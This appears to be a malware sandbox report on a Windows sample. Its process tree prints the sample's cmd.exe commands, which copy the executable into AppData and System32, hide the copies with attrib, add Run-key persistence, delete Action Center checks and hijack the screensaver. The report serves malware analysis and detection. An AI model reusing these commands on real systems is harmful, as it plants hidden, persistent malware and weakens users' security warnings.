3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4636	iexplore.exe
4636	iexplore.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4636	iexplore.exe
4636	iexplore.exe
5100	IEXPLORE.EXE
5100	IEXPLORE.EXE
5100	IEXPLORE.EXE
5100	IEXPLORE.EXE
4636	iexplore.exe
4636	iexplore.exe
3564	IEXPLORE.EXE
3564	IEXPLORE.EXE
3564	IEXPLORE.EXE
3564	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3036 wrote to memory of 3444	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	82
PID 3036 wrote to memory of 3444	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	82
PID 3036 wrote to memory of 3444	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	82
PID 3036 wrote to memory of 3632	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	84
PID 3036 wrote to memory of 3632	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	84
PID 3036 wrote to memory of 3632	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	84
PID 3444 wrote to memory of 5068	3444	cmd.exe	86
PID 3444 wrote to memory of 5068	3444	cmd.exe	86
PID 3444 wrote to memory of 5068	3444	cmd.exe	86
PID 3632 wrote to memory of 2608	3632	cmd.exe	87
PID 3632 wrote to memory of 2608	3632	cmd.exe	87
PID 3632 wrote to memory of 2608	3632	cmd.exe	87
PID 3036 wrote to memory of 2492	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	92
PID 3036 wrote to memory of 2492	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	92
PID 3036 wrote to memory of 2492	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	92
PID 3036 wrote to memory of 4204	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	94
PID 3036 wrote to memory of 4204	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	94
PID 3036 wrote to memory of 4204	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	94
PID 3036 wrote to memory of 228	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	96
PID 3036 wrote to memory of 228	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	96
PID 3036 wrote to memory of 228	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	96
PID 3036 wrote to memory of 5092	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	98
PID 3036 wrote to memory of 5092	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	98
PID 3036 wrote to memory of 5092	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	98
PID 3036 wrote to memory of 1404	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	100
PID 3036 wrote to memory of 1404	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	100
PID 3036 wrote to memory of 1404	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	100
PID 3036 wrote to memory of 5072	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	101
PID 3036 wrote to memory of 5072	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	101
PID 3036 wrote to memory of 5072	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	101
PID 3036 wrote to memory of 4536	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	103
PID 3036 wrote to memory of 4536	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	103
PID 3036 wrote to memory of 4536	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	103
PID 3036 wrote to memory of 2068	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	106
PID 3036 wrote to memory of 2068	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	106
PID 3036 wrote to memory of 2068	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	106
PID 3036 wrote to memory of 4248	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	107
PID 3036 wrote to memory of 4248	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	107
PID 3036 wrote to memory of 4248	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	107
PID 3036 wrote to memory of 4948	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	109
PID 3036 wrote to memory of 4948	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	109
PID 3036 wrote to memory of 4948	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	109
PID 228 wrote to memory of 4124	228	cmd.exe	112
PID 228 wrote to memory of 4124	228	cmd.exe	112
PID 228 wrote to memory of 4124	228	cmd.exe	112
PID 5092 wrote to memory of 3340	5092	cmd.exe	113
PID 5092 wrote to memory of 3340	5092	cmd.exe	113
PID 5092 wrote to memory of 3340	5092	cmd.exe	113
PID 5072 wrote to memory of 4260	5072	cmd.exe	114
PID 5072 wrote to memory of 4260	5072	cmd.exe	114
PID 5072 wrote to memory of 4260	5072	cmd.exe	114
PID 3036 wrote to memory of 4040	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	120
PID 3036 wrote to memory of 4040	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	120
PID 3036 wrote to memory of 4040	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	120
PID 4040 wrote to memory of 1300	4040	cmd.exe	122
PID 4040 wrote to memory of 1300	4040	cmd.exe	122
PID 4040 wrote to memory of 1300	4040	cmd.exe	122
PID 3036 wrote to memory of 1128	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	123
PID 3036 wrote to memory of 1128	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	123
PID 3036 wrote to memory of 1128	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	123
PID 3036 wrote to memory of 3260	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	125
PID 3036 wrote to memory of 3260	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	125
PID 3036 wrote to memory of 3260	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	125
PID 3036 wrote to memory of 2600	3036	ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe	126

Views/modifies file attributes 1 TTPs 20 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3512	attrib.exe
2380	attrib.exe
2124	attrib.exe
4780	attrib.exe
4464	attrib.exe
2640	attrib.exe
5068	attrib.exe
3448	attrib.exe
3936	attrib.exe
2084	attrib.exe
2608	attrib.exe
2496	attrib.exe
2356	attrib.exe
4148	attrib.exe
2964	attrib.exe
3320	attrib.exe
3508	attrib.exe
3880	attrib.exe
1300	attrib.exe
2168	attrib.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3004

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3596

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3848

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4000

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3460

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:1400

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3960

C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3036
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "%appdata%\daemon.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3444
- - C:\Windows\SysWOW64\attrib.exe
    attrib -S -R -H "C:\Users\Admin\AppData\Roaming\daemon.exe"
    3⤵
    - Views/modifies file attributes
    PID:5068
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -S -R -H "%windir%\system32sysrunc.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3632
- - C:\Windows\SysWOW64\attrib.exe
    attrib -S -R -H "C:\Windows\system32sysrunc.exe"
    3⤵
    - Views/modifies file attributes
    PID:2608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rename "%appdata%\daemon.exe" "trash1.dat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2492
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c rename "%windir%\system32\sysrunc.exe" "trash2.dat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:228
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v EnableBalloonTips /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4124
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5092
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKCU\software\microsoft\windows\currentversion\action center\checks" /f
    3⤵
    PID:3340
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\plugininstall.bat"
  2⤵
  PID:1404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software" /v "crc32" /t REG_SZ /d "jnpwnGGW" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\software" /v "crc32" /t REG_SZ /d "jnpwnGGW" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4260
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "%appdata%\trash1.dat"
  2⤵
  PID:4536
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "%windir%\system32\trash2.dat"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2068
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /s /f "%appdata%\trash1.dat"
  2⤵
  PID:4248
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /s /f "%windir%\system32\trash2.dat"
  2⤵
  PID:4948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\daemon.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Users\Admin\AppData\Roaming\daemon.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1300
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe" "%appdata%\daemon.exe"
  2⤵
  PID:1128
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\daemon.exe"
  2⤵
  PID:3260
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Users\Admin\AppData\Roaming\daemon.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2168
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "%appdata%\daemon.exe" /f
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\daemon.exe" /f
    3⤵
    - Adds Run key to start application
    PID:5060
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysrunc.exe"
  2⤵
  PID:644
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Windows\system32\sysrunc.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:4148
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe" "%windir%\system32\sysrunc.exe"
  2⤵
  - Drops file in System32 directory
  PID:1760
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysrunc.exe"
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Windows\system32\sysrunc.exe"
    3⤵
    - Sets file to hidden
    - Drops file in System32 directory
    - Views/modifies file attributes
    PID:2496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "%windir%\system32\sysrunc.exe" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1196
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "C:\Windows\system32\sysrunc.exe" /f
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:812
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows
  2⤵
  PID:2608
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\3dtext.scr"
  2⤵
  PID:4440
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"
    3⤵
    - Views/modifies file attributes
    PID:3320
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe" "%appdata%\Microsoft\Windows\3dtext.scr"
  2⤵
  PID:784
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\3dtext.scr"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4356
- - C:\Windows\SysWOW64\attrib.exe
    attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3936
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\3dtext.scr" /f
  2⤵
  PID:2164
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5092
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
  2⤵
  PID:4152
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
    3⤵
    PID:4928
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:468
- - C:\Windows\SysWOW64\reg.exe
    reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
    3⤵
    PID:5076
- C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Modifies Control Panel
  PID:4260
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del "%appdata%\trash1.dat"
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del "%windir%\system32\trash2.dat"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del /s /f "%appdata%\trash1.dat"
    3⤵
    PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c del /s /f "%windir%\system32\trash2.dat"
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\daemon.exe"
    3⤵
    PID:1948
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -R -H -S "C:\Users\Admin\AppData\Roaming\daemon.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3448
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe" "%appdata%\daemon.exe"
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\daemon.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4660
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H +S "C:\Users\Admin\AppData\Roaming\daemon.exe"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:3512
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "%appdata%\daemon.exe" /f
    3⤵
    PID:2724
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\software\microsoft\windows\currentversion\run" /v "daemon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\daemon.exe" /f
      4⤵
      Adds Run key to start application
      PID:4368
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%windir%\system32\sysrunc.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2456
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -R -H -S "C:\Windows\system32\sysrunc.exe"
      4⤵
      Drops file in System32 directory
      Views/modifies file attributes
      PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe" "%windir%\system32\sysrunc.exe"
    3⤵
    - Drops file in System32 directory
    PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%windir%\system32\sysrunc.exe"
    3⤵
    PID:3496
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H +S "C:\Windows\system32\sysrunc.exe"
      4⤵
      Sets file to hidden
      Drops file in System32 directory
      Views/modifies file attributes
      PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "%windir%\system32\sysrunc.exe" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4040
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKLM\software\microsoft\windows\currentversion\run" /v "sysrunc" /t REG_SZ /d "C:\Windows\system32\sysrunc.exe" /f
      4⤵
      Adds Run key to start application
      PID:4280
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c md %appdata%\Microsoft\Windows
    3⤵
    PID:4640
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib -R -H -S "%appdata%\Microsoft\Windows\3dtext.scr"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3628
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -R -H -S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\ef1d48e8226e491133525df0e4d44dea_JaffaCakes118.exe" "%appdata%\Microsoft\Windows\3dtext.scr"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c attrib +R +H +S "%appdata%\Microsoft\Windows\3dtext.scr"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1664
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +R +H +S "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr"
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:2964
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "%appdata%\Microsoft\Windows\3dtext.scr" /f
    3⤵
    PID:724
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\Control Panel\Desktop" /v "SCRNSAVE.EXE" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\3dtext.scr" /f
      4⤵
      PID:3652
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4628
  - - C:\Windows\SysWOW64\reg.exe
      reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:404
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg ADD "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
    3⤵
    - System Location Discovery: System Language Discovery
